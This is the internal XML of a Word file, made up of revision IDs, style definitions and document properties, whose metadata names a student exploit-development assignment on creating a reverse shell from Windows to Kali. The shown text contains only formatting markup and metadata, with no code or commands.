    <w:rsid w:val="0055127A"/>
    <w:rsid w:val="005A5393"/>
    <w:rsid w:val="005A747B"/>
    <w:rsid w:val="005B1A6E"/>
    <w:rsid w:val="005B1DAB"/>
    <w:rsid w:val="005B2760"/>
    <w:rsid w:val="005E3F17"/>
    <w:rsid w:val="005F47D6"/>
    <w:rsid w:val="00620BEC"/>
    <w:rsid w:val="00636D65"/>
    <w:rsid w:val="00697A2E"/>
    <w:rsid w:val="006A2807"/>
    <w:rsid w:val="006C6C26"/>
    <w:rsid w:val="006D5BB2"/>
    <w:rsid w:val="006E1391"/>
    <w:rsid w:val="0071463F"/>
    <w:rsid w:val="007430C1"/>
    <w:rsid w:val="00755FFF"/>
    <w:rsid w:val="00770AE4"/>
    <w:rsid w:val="00770CC1"/>
    <w:rsid w:val="00773EC4"/>
    <w:rsid w:val="00776548"/>
    <w:rsid w:val="00777FB3"/>
    <w:rsid w:val="007A1075"/>
    <w:rsid w:val="007B29F4"/>
    <w:rsid w:val="007C1921"/>
    <w:rsid w:val="007C1C5F"/>
    <w:rsid w:val="007E3E3C"/>
    <w:rsid w:val="00812113"/>
    <w:rsid w:val="008147A5"/>
    <w:rsid w:val="00832691"/>
    <w:rsid w:val="00884DA9"/>
    <w:rsid w:val="008A1F7E"/>
    <w:rsid w:val="008F226B"/>
    <w:rsid w:val="009411D4"/>
    <w:rsid w:val="0094273C"/>
    <w:rsid w:val="00951FFB"/>
    <w:rsid w:val="00957052"/>
    <w:rsid w:val="009C1C5F"/>
    <w:rsid w:val="009C24E6"/>
    <w:rsid w:val="009D1335"/>
    <w:rsid w:val="009D1C8A"/>
    <w:rsid w:val="009F6449"/>
    <w:rsid w:val="00A20EE2"/>
    <w:rsid w:val="00A51B48"/>
    <w:rsid w:val="00A533CD"/>
    <w:rsid w:val="00A61197"/>
    <w:rsid w:val="00A750B4"/>
    <w:rsid w:val="00A77DD8"/>
    <w:rsid w:val="00A81D8D"/>
    <w:rsid w:val="00A83C4B"/>
    <w:rsid w:val="00A95EAB"/>
    <w:rsid w:val="00AB26EA"/>
    <w:rsid w:val="00AC1FC8"/>
    <w:rsid w:val="00AC6376"/>
    <w:rsid w:val="00AC7B6B"/>
    <w:rsid w:val="00AD66D9"/>
    <w:rsid w:val="00AF132C"/>
    <w:rsid w:val="00AF1604"/>
    <w:rsid w:val="00B159BF"/>
    <w:rsid w:val="00B22A79"/>
    <w:rsid w:val="00B6197D"/>
    <w:rsid w:val="00B640F1"/>
    <w:rsid w:val="00B6718F"/>
    <w:rsid w:val="00B678AC"/>
    <w:rsid w:val="00BA3F69"/>
    <w:rsid w:val="00BA6AD0"/>
    <w:rsid w:val="00BA7FE0"/>
    <w:rsid w:val="00BB0F84"/>
    <w:rsid w:val="00BD6AA4"/>
    <w:rsid w:val="00BF5FA7"/>
    <w:rsid w:val="00BF6A51"/>
    <w:rsid w:val="00C15D2B"/>
    <w:rsid w:val="00C210F9"/>
    <w:rsid w:val="00C32734"/>
    <w:rsid w:val="00C32F26"/>
    <w:rsid w:val="00C32FFB"/>
    <w:rsid w:val="00C54312"/>
    <w:rsid w:val="00C62D63"/>
    <w:rsid w:val="00C63BE2"/>
    <w:rsid w:val="00C83606"/>
    <w:rsid w:val="00CA096E"/>
    <w:rsid w:val="00CB6132"/>
    <w:rsid w:val="00CB7A32"/>
    <w:rsid w:val="00D02935"/>
    <w:rsid w:val="00D179C7"/>
    <w:rsid w:val="00D30123"/>
    <w:rsid w:val="00D3679E"/>
    <w:rsid w:val="00D37DB7"/>
    <w:rsid w:val="00D4496E"/>
    <w:rsid w:val="00D7764A"/>
    <w:rsid w:val="00D81FF1"/>
    <w:rsid w:val="00D86532"/>
    <w:rsid w:val="00D9755E"/>
    <w:rsid w:val="00DA11D8"/>
    <w:rsid w:val="00DA3C03"/>
    <w:rsid w:val="00DB40A8"/>
    <w:rsid w:val="00DB5727"/>
    <w:rsid w:val="00DD693B"/>
    <w:rsid w:val="00DF0DAA"/>
    <w:rsid w:val="00DF219D"/>
    <w:rsid w:val="00DF7FC7"/>
    <w:rsid w:val="00E37EF4"/>
    <w:rsid w:val="00E475CA"/>
    <w:rsid w:val="00E550F0"/>
    <w:rsid w:val="00E67675"/>
    <w:rsid w:val="00E67C7C"/>
    <w:rsid w:val="00E7588F"/>
    <w:rsid w:val="00E97EB0"/>
    <w:rsid w:val="00EB1612"/>
    <w:rsid w:val="00EB3351"/>
    <w:rsid w:val="00EC3029"/>
    <w:rsid w:val="00EE4372"/>
    <w:rsid w:val="00F0001F"/>
    <w:rsid w:val="00F0307E"/>
    <w:rsid w:val="00F31B04"/>
    <w:rsid w:val="00F4240B"/>
    <w:rsid w:val="00F471A4"/>
    <w:rsid w:val="00F830C2"/>
    <w:rsid w:val="00FA6A3C"/>
    <w:rsid w:val="00FA7B0D"/>
    <w:rsid w:val="00FC6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BE56C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{47122447-2BD8-4E4A-9671-ED07EC1AB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830C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32"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0032378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2"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="001376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B335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B335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830C2"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs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2378B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs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37690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msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001376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3769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7690"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rsid w:val="001376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76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7690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137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kn">
    <w:name w:val="kn"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nn">
    <w:name w:val="nn"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="n">
    <w:name w:val="n"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00137690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37690"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mi">
    <w:name w:val="mi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kc">
    <w:name w:val="kc"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mf">
    <w:name w:val="mf"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ow">
    <w:name w:val="ow"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="se">
    <w:name w:val="se"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nf">
    <w:name w:val="nf"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s2">
    <w:name w:val="s2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="si">
    <w:name w:val="si"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00137690"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E67C7C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61197"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="36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884DA9"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00BF5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C62D6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5A53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6409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75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9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5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25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497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71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0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3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88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218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57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0103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640578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5241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1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86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915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89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4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46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028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3138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7084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1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9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5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55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24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3360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4107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6702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14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8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856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7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891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3647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15887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2777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6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33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48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28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8428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97510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8333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1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81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99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0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80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2818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04117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072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24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780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1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430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12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2980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636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66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91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83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8885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9999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257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3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2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16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4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7990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7985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871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43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29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8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72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344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918981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5395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4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131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98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75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031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1794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41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336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06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0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95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11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8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673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65000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35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46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73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9007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03420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50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0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89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03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0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8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085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72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2439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82881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0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82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68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51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75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1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6656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3850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841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45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28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2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426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39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45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62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31939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66490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74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4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6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293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9692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165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327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11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528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911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408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50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51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28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86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996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71493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82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5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9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65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75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2039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410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121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94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73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711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94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8614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581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02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21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86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97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437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74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2627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459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611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10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9093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5199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52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20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039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8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23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5010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59723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111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96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68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9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76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49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499771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123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4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74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8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92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10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058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707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39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3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06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63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84626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89651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091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9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03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24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24078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308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7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2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5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261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40993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082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24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193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8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A28568B-E398-42A5-884E-25AF89850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6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hine Learning Assignment</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/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TS Exploit DevelopmentAssignment</dc:title>
  <dc:subject>Creating a reverse shell to access Kali through Windows</dc:subject>
  <dc:creator>C.N Samarasekara</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Chamath Samarasekara</cp:lastModifiedBy>
  <cp:revision>157</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-07T17:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-12T17:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>